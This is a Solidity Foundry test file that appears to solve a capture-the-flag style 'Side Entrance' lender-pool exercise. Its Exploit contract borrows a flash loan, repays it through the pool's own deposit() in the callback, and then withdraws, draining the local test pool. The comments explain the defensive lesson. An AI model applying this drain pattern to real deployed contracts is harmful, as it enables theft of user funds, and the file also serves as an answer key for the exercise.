// SPDX-License-Identifier: MIT | |
pragma solidity >=0.8.0; | |
import {Utilities} from "../../utils/Utilities.sol"; | |
import "forge-std/Test.sol"; | |
import {SideEntranceLenderPool} from "../src/SideEntranceLenderPool.sol"; | |
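/// @title Borrower fixture for the Side Entrance lender-pool exercise.
/// @notice Takes a flash loan from the pool and, inside the loan callback,
///         sends the borrowed ETH back through the pool's `deposit()` path.
/// @dev The pool source is not part of this file. Presumably `flashLoan`
///      calls back `execute()` on the borrower and then only compares its own
///      ETH balance before and after -- TODO confirm against
///      SideEntranceLenderPool.sol. If so, the defensive takeaway is that a
///      lender's repayment check must not be satisfiable through its own
///      deposit accounting: block deposit/withdraw while a loan is in flight,
///      or track lent funds separately from user credit.
contract Exploit {
    // Address of the SideEntranceLenderPool under test, fixed at deployment.
    address sideAddr;

    /// @param _sideAddr Address of the deployed SideEntranceLenderPool.
    constructor(address _sideAddr) {
        sideAddr = _sideAddr;
    }

    /// @notice Requests a flash loan of `_amount` wei from the pool.
    /// @param _amount Amount of ETH (in wei) to borrow.
    function attack(uint256 _amount) public payable {
        SideEntranceLenderPool side = SideEntranceLenderPool(sideAddr);
        side.flashLoan(_amount);
    }

    /// @notice Calls the pool's `withdraw()` and forwards this contract's whole
    ///         ETH balance to the caller.
    /// @dev NOTE(review): there is no access control, so any caller receives the
    ///      balance. That is tolerable in a test fixture only.
    function withdraw() public {
        SideEntranceLenderPool side = SideEntranceLenderPool(sideAddr);
        side.withdraw();

        // A low-level call reports failure through its return value instead of
        // reverting. Checking it keeps a failed transfer from passing silently
        // and leaving the ETH stranded in this contract.
        (bool sent, ) = payable(msg.sender).call{value: address(this).balance}("");
        require(sent, "ETH transfer failed");
    }

    /// @notice Deposits this contract's entire ETH balance into the pool.
    /// @dev Presumably invoked by the pool as the flash-loan callback; the
    ///      function itself does not check who the caller is.
    function execute() external payable {
        SideEntranceLenderPool side = SideEntranceLenderPool(sideAddr);
        side.deposit{value: address(this).balance}();
    }

    // Accepts plain ETH transfers, such as the payout of the pool's `withdraw()`.
    fallback() external payable {}
}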
/// @title Foundry test for the Side Entrance lender-pool exercise.
/// @notice Funds a fresh pool with ETHER_IN_POOL, runs the borrower fixture as
///         the attacker account, then asserts the pool was emptied and the
///         attacker's balance grew.
contract SideEntrance is Test {
    // ETH placed in the pool before the scenario runs (1000 ether, in wei).
    uint256 internal constant ETHER_IN_POOL = 1_000e18;

    Utilities internal utils;
    SideEntranceLenderPool internal sideEntranceLenderPool;
    address payable internal attacker;
    // Attacker balance recorded in setUp(); the baseline for validation().
    uint256 public attackerInitialEthBalance;

    /// @notice Creates the attacker account, deploys and funds the pool, and
    ///         records the attacker's starting balance.
    function setUp() public {
        utils = new Utilities();
        address payable[] memory accounts = utils.createUsers(1);
        attacker = accounts[0];
        vm.label(attacker, "Attacker");

        sideEntranceLenderPool = new SideEntranceLenderPool();
        address poolAddr = address(sideEntranceLenderPool);
        vm.label(poolAddr, "Side Entrance Lender Pool");

        // Fund the pool directly via the cheatcode and confirm the balance
        // before any scenario code runs.
        vm.deal(poolAddr, ETHER_IN_POOL);
        assertEq(poolAddr.balance, ETHER_IN_POOL);

        attackerInitialEthBalance = attacker.balance;

        console.log(unicode"🧨 Let's see if you can break it... 🧨");
    }

    /// @notice Runs the scenario and then checks the end state.
    function testExploit() public {
        // ---- scenario start ----
        // The fixture is deployed before the prank begins, so the test contract
        // is its deployer; only the two calls below are made as `attacker`.
        Exploit borrower = new Exploit(address(sideEntranceLenderPool));

        vm.startPrank(attacker);
        borrower.attack(ETHER_IN_POOL);
        borrower.withdraw();
        vm.stopPrank();
        // ---- scenario end ----

        validation();
        console.log(unicode"\n🎉 Congratulations");
    }

    /// @notice Asserts that the pool holds no ETH and that the attacker holds
    ///         more than at setup.
    /// @dev The second check is a strict "greater than", not an exact match
    ///      against ETHER_IN_POOL.
    function validation() internal {
        uint256 poolBalance = address(sideEntranceLenderPool).balance;
        assertEq(poolBalance, 0);

        uint256 attackerBalance = attacker.balance;
        assertGt(attackerBalance, attackerInitialEthBalance);
    }
}